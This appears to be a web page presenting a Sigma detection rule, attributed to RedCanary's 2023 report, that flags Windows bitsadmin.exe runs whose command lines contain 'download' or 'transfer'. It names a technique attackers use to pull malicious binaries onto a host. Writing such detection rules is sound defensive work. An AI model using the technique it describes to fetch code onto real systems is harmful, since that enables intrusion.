BITSAdmin Downloading Malicious Binaries (RedCanary Threat Detection Report)

Detects attempts to bypass security controls using bitsadmin.exe to download malicious code. Part of the RedCanary 2023 Threat Detection Report.

Sigma rule (View on GitHub)

 1title: BITSAdmin Downloading Malicious Binaries (RedCanary Threat Detection Report)
 2id: 0a6b7cc5-f28e-4795-94bf-48112d89664b
 3status: experimental
 4description: |
 5    Detects attempts to bypass security controls using bitsadmin.exe to download malicious code. 
 6    Part of the RedCanary 2023 Threat Detection Report.    
 7references:
 8    - https://redcanary.com/threat-detection-report/techniques/ingress-tool-transfer/
 9author: RedCanary, Sigma formatting by Micah Babinski
10date: 2023/05/10
11tags:
12    - attack.command_and_control
13    - attack.t1105
14logsource:
15    category: process_creation
16    product: windows
17detection:
18    selection:
19        Image|endswith: '\bitsadmin.exe'
20        CommandLine|contains:
21            - 'download'
22            - 'transfer'
23    condition: selection
24falsepositives:
25    - Unknown
26level: low```

References

Related rules

to-top